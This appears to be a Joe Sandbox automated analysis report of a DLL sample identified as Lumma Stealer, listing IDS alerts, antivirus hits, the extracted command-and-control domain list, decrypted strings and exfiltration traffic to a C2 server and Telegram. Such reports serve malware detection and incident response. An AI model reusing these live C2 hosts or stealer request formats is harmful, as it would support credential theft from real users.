            2024-12-27T22:33:15.736647+010020283713Unknown Traffic192.168.2.449752104.21.60.24443TCP
            2024-12-27T22:33:17.800514+010020283713Unknown Traffic192.168.2.449755104.21.60.24443TCP
            2024-12-27T22:33:18.118672+010020283713Unknown Traffic192.168.2.449757104.21.60.24443TCP
            2024-12-27T22:33:20.468696+010020283713Unknown Traffic192.168.2.449759104.21.60.24443TCP
            2024-12-27T22:33:22.642716+010020283713Unknown Traffic192.168.2.449761104.21.60.24443TCP
            2024-12-27T22:33:25.368007+010020283713Unknown Traffic192.168.2.449762104.21.60.24443TCP
            2024-12-27T22:33:25.371664+010020283713Unknown Traffic192.168.2.449763104.21.60.24443TCP
            2024-12-27T22:33:27.646795+010020283713Unknown Traffic192.168.2.449764104.21.60.24443TCP
            2024-12-27T22:33:27.726911+010020283713Unknown Traffic192.168.2.449765104.21.60.24443TCP
            2024-12-27T22:33:30.225396+010020283713Unknown Traffic192.168.2.449766104.21.60.24443TCP
            2024-12-27T22:33:31.355502+010020283713Unknown Traffic192.168.2.449767104.21.60.24443TCP
            2024-12-27T22:33:33.056891+010020283713Unknown Traffic192.168.2.449768104.21.60.24443TCP
            2024-12-27T22:33:33.062072+010020283713Unknown Traffic192.168.2.449769104.21.60.24443TCP
            2024-12-27T22:33:35.300277+010020283713Unknown Traffic192.168.2.449770104.21.60.24443TCP
            2024-12-27T22:33:35.326498+010020283713Unknown Traffic192.168.2.449771104.21.60.24443TCP
            2024-12-27T22:33:37.378300+010020283713Unknown Traffic192.168.2.449772104.21.60.24443TCP
            2024-12-27T22:33:39.029433+010020283713Unknown Traffic192.168.2.449773104.21.60.24443TCP
            2024-12-27T22:33:39.529055+010020283713Unknown Traffic192.168.2.449774104.21.60.24443TCP
            2024-12-27T22:33:41.877377+010020283713Unknown Traffic192.168.2.449775104.21.60.24443TCP
            2024-12-27T22:33:45.407596+010020283713Unknown Traffic192.168.2.449776104.21.60.24443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T22:33:13.917198+010020546531A Network Trojan was detected192.168.2.449745104.21.60.24443TCP
            2024-12-27T22:33:14.145093+010020546531A Network Trojan was detected192.168.2.449746104.21.60.24443TCP
            2024-12-27T22:33:14.156465+010020546531A Network Trojan was detected192.168.2.449747104.21.60.24443TCP
            2024-12-27T22:33:16.406176+010020546531A Network Trojan was detected192.168.2.449750104.21.60.24443TCP
            2024-12-27T22:33:16.410276+010020546531A Network Trojan was detected192.168.2.449751104.21.60.24443TCP
            2024-12-27T22:33:16.504808+010020546531A Network Trojan was detected192.168.2.449752104.21.60.24443TCP
            2024-12-27T22:33:18.579172+010020546531A Network Trojan was detected192.168.2.449755104.21.60.24443TCP
            2024-12-27T22:33:32.419887+010020546531A Network Trojan was detected192.168.2.449767104.21.60.24443TCP
            2024-12-27T22:33:39.826826+010020546531A Network Trojan was detected192.168.2.449773104.21.60.24443TCP
            2024-12-27T22:33:46.187336+010020546531A Network Trojan was detected192.168.2.449776104.21.60.24443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T22:33:13.917198+010020498361A Network Trojan was detected192.168.2.449745104.21.60.24443TCP
            2024-12-27T22:33:14.145093+010020498361A Network Trojan was detected192.168.2.449746104.21.60.24443TCP
            2024-12-27T22:33:14.156465+010020498361A Network Trojan was detected192.168.2.449747104.21.60.24443TCP
            2024-12-27T22:33:16.504808+010020498361A Network Trojan was detected192.168.2.449752104.21.60.24443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T22:33:16.406176+010020498121A Network Trojan was detected192.168.2.449750104.21.60.24443TCP
            2024-12-27T22:33:16.410276+010020498121A Network Trojan was detected192.168.2.449751104.21.60.24443TCP
            2024-12-27T22:33:18.579172+010020498121A Network Trojan was detected192.168.2.449755104.21.60.24443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T22:33:21.291774+010020480941Malware Command and Control Activity Detected192.168.2.449759104.21.60.24443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T22:33:10.318916+010028000291Attempted User Privilege Gain147.45.44.13180192.168.2.449741TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T22:32:58.287929+010018100071Potentially Bad Traffic192.168.2.449732149.154.167.220443TCP
            2024-12-27T22:32:58.346022+010018100071Potentially Bad Traffic192.168.2.449731149.154.167.220443TCP
            2024-12-27T22:32:58.367886+010018100071Potentially Bad Traffic192.168.2.449730149.154.167.220443TCP
            2024-12-27T22:33:00.345165+010018100071Potentially Bad Traffic192.168.2.449733149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
            Source: C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
            Source: C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
            Source: C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
            Found malware configuration
            Source: 45.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["tentabatte.lat", "slipperyloo.lat", "wordyfindy.lat", "shapestickyr.lat", "bashfulacid.lat", "manyrestro.lat", "curverpluch.lat", "talkynicer.lat", "fivenaii.click"], "Build id": "VC6Dfm--TestOtctuk"}
            Multi AV Scanner detection for submitted file
            Source: iviewers.dllReversingLabs: Detection: 47%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dllJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dllJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dllJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dllJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bashfulacid.lat
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tentabatte.lat
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: curverpluch.lat
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: talkynicer.lat
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shapestickyr.lat
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: manyrestro.lat
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: slipperyloo.lat
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wordyfindy.lat
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fivenaii.click
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: VC6Dfm--TestOtctuk
            Source: iviewers.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49768 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49774 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49776 version: TLS 1.2
            Source: iviewers.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.pdb source: powershell.exe, 0000001D.00000002.1831061949.0000000005814000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.pdb source: powershell.exe, 00000025.00000002.1915834227.0000000005718000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.pdb source: powershell.exe, 0000001B.00000002.1861999388.00000000056D5000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.pdb source: powershell.exe, 00000018.00000002.1835577839.0000000004D85000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F957B70 FindFirstFileExW,0_2_6F957B70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F957C21 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_6F957C21
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\3D Objects
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Packages
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\CEF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Mozilla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepub

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]45_2_00408A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ebx45_2_00408600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al45_2_0042C850
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push esi45_2_0040C805
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h45_2_00422830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]45_2_0043C830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, ecx45_2_004290D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al45_2_0042E0DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax45_2_0041D8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax45_2_0041D8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al45_2_0042C0E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx45_2_0041B8F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx45_2_0041B8F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al45_2_0042C09E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebx45_2_0041C8A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]45_2_0041C8A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]45_2_0041C8A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]45_2_0041C8A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax45_2_0041D8AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax45_2_0041D8AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al45_2_0042C09E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]45_2_00441160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [00446130h]45_2_00418169
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h45_2_0042B170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax45_2_0042D17D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax45_2_0042D116
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h45_2_004281CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h45_2_004289E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al45_2_0042B980
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h45_2_0043C990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx45_2_004239B9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]45_2_004239B9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h45_2_0043CA40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx45_2_00421A10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]45_2_00436210
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then dec edx45_2_0043FA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]45_2_0042AAC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]45_2_0040AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h45_2_00440340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al45_2_0042D34A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax45_2_0041C300
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then dec edx45_2_0043FB10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then dec edx45_2_0043FB2A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then dec edx45_2_0043FB28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]45_2_004073D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]45_2_004073D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h45_2_004283D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]45_2_0041EB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebx45_2_00427440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]45_2_00427440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]45_2_0042C465
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al45_2_0042C465
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]45_2_0040CC7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx45_2_0041747D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], di45_2_0041747D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h45_2_00414CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then dec edx45_2_0043FD70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]45_2_0041B57D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]45_2_00440D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h45_2_00428528
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx45_2_00426D2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]45_2_0043EDC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh45_2_0043CDF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]45_2_0043CDF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh45_2_0043CDF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h45_2_0043CDF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al45_2_0042DDFF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, ecx45_2_0042A5B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax45_2_00422E6D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx45_2_00422E6D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]45_2_00422E6D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then dec edx45_2_0043FE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al45_2_0042DE07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]45_2_004406F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx45_2_00429E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]45_2_00402EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]45_2_00427740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx45_2_00416F52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax45_2_0042BF13
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [esp+28h]45_2_00425F1B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]45_2_00441720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax45_2_00429739
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx45_2_004237D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp+20h], eax45_2_00409780

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 147.45.44.131:80 -> 192.168.2.4:49741
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49751 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49751 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49747 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49752 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49752 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49759 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49767 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49732 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49731 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49746 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49750 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49730 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49745 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49733 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49773 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49776 -> 104.21.60.24:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49755 -> 104.21.60.24:443
